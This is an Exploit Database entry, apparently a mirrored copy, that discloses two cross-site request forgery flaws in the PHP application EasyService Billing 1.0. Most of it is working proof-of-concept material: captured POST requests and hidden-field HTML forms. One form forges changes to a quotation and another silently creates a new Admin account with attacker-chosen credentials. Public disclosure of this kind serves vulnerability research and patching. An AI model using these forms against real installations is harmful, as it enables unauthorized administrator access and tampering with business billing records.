EasyService Billing 1.0 – Cross-Site Request Forgery

• Exploit Database
• 115 阅读

• 作者： Divya Jain
  日期： 2018-05-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44763/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88

  <!-- # Exploit Title: EasyService Billing 1.0 Multiple Cross-Site Request Forgery # Date: 25-05-2018 # Software Link: https://codecanyon.net/item/easyservice-billing-php-scripts-for-quotation-invoice-payments-etc/16687594 # Exploit Author: Divya Jain # Version: EasyService Billing 1.0 # CVE: CVE-2018-11445,CVE-2018-11442 # Category: Webapps # Severity: Medium # Tested on: KaLi LinuX_x64 # # # # # # # # # # Proof of Concept: ////////////////////////// / CSRF in Quotation Page / ////////////////////////// # Initial Request:   POST /EasyServiceBilling/quotation-new3-new2.php?add=true&id=139 HTTP/1.1 Host: test.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://test.com/EasyServiceBilling/quotation-new3-new2.php?add=true&id=139 Cookie: tntcon=5078855aa89b90f68de5644f75495364a4xn; PHPSESSID=58bf7e8rf0jpiepg3iu7larrj2 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 86   quotation_id=139&quotation_no=249&des=test&button=Save&MM_update=form1&MM_insert=form1   # CSRF POC:   <html> <body> <script>history.pushState(&apos;&apos;, &apos;&apos;, &apos;/&apos;)</script> <form action="http://test.com/EasyServiceBilling/quotation-new3-new2.php?add=true&id=139" method="POST"> <input type="hidden" name="quotation&#95;id" value="139" /> <input type="hidden" name="quotation&#95;no" value="249" /> <input type="hidden" name="des" value="testnew" /> <input type="hidden" name="button" value="Save" /> <input type="hidden" name="MM&#95;update" value="form1" /> <input type="hidden" name="MM&#95;insert" value="form1" /> <input type="submit" value="Submit request" /> </form> </body> </html>   /////////////////////////// // CSRF in User Add Page // /////////////////////////// # Initial Request   POST /EasyServiceBilling/system-settings-user-new2.php? HTTP/1.1 Host: test.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://test.com/EasyServiceBilling/system-settings-user-new2.php Cookie: tntcon=ea1c7cc27fc02e6abf755d54fa60a8a8a4xn; PHPSESSID=kao38vbne4c4s9s0587o8h99e6 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 36   type=Admin&un=a&pw=b&MM_insert=form1 # CSRF POC   <html> <body> <script>history.pushState(&apos;&apos;, &apos;&apos;, &apos;/&apos;)</script> <form action="http://test.com/EasyServiceBilling/system-settings-user-new2.php?" method="POST"> <input type="hidden" name="type" value="Admin" /> <input type="hidden" name="un" value="adminTest" /> <input type="hidden" name="pw" value="adminTest" /> <input type="hidden" name="MM&#95;insert" value="form1" /> <input type="submit" value="Submit request" /> </form> </body> </html> -->